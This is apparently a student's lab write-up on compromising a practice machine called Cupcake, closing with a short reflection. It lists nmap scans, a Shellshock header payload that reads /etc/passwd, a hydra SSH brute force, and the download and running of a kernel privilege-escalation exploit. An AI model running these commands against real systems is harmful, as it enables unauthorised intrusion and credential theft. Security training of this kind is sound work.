Exploiting Cupcake

Active Recon

NMAP Scans

• nmap --top-ports 100 'ip' to find the top 100 open ports.
• nmap -O -sV --top-ports 100 'ip' to do an OS and version detection scan.
• nmap -A -p 'port' 'ip' to get more information on open ports.
• sudo nmap -sT -sV --top-ports 100 'ip' -Pn -oG 'outputfile' out put scan results to a file. nmaptocsv -i 'nmapscan' -d ',' copy csv to spreadsheet.

Other

• Use information from scan to find versions and releases.
• See what the web server or open ports have that is accessible.

Remote Code Execution

• The exploit that is used can be found here
• Uses malicious request headers execute code
• Using nmap sudo nmap -sV -p 80 --script http-shellshock --script-args ur1=/cgi-bin/status,cmd="echo : echo : /bin/uname -a" 10.0.5.23
• Using curl curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http://10.0.5.23/cgi-bin/status

Password list and ssh bruteforce

• Search the rock you wordlist for passwords containing a username grep -i 'username' /usr/share/wordlists/rockyou.txt
• Use hydra to brute force ssh. hydra -l 'user' -p 'possible passwords' 'ip' -t 4 ssh

Root compromise

• use search sploit to identify exploit for Linux version searchsploit Linux Kernel 2.6
• download selected exploit searchsploit -m 'exploitfile'
• Make a python webserver to transfer files python3 -m http.server 'port'
• Download on machine using wget http://'attackermachine':'port'/'file'
• Run the c exploit using gcc compile using gcc 'file' -o 'output' us -l to add dependencies
• run the exploit ./'file'

Reflection

The techniques used to exploit cupcake seemed straight forward to me. However the research to identify the working vulnerabilities was the most confusing part. Exploits and commands are easy enough to run once their found but finding them seems to be the more difficult part. I suppose the though process of finding the best exploits will come with time.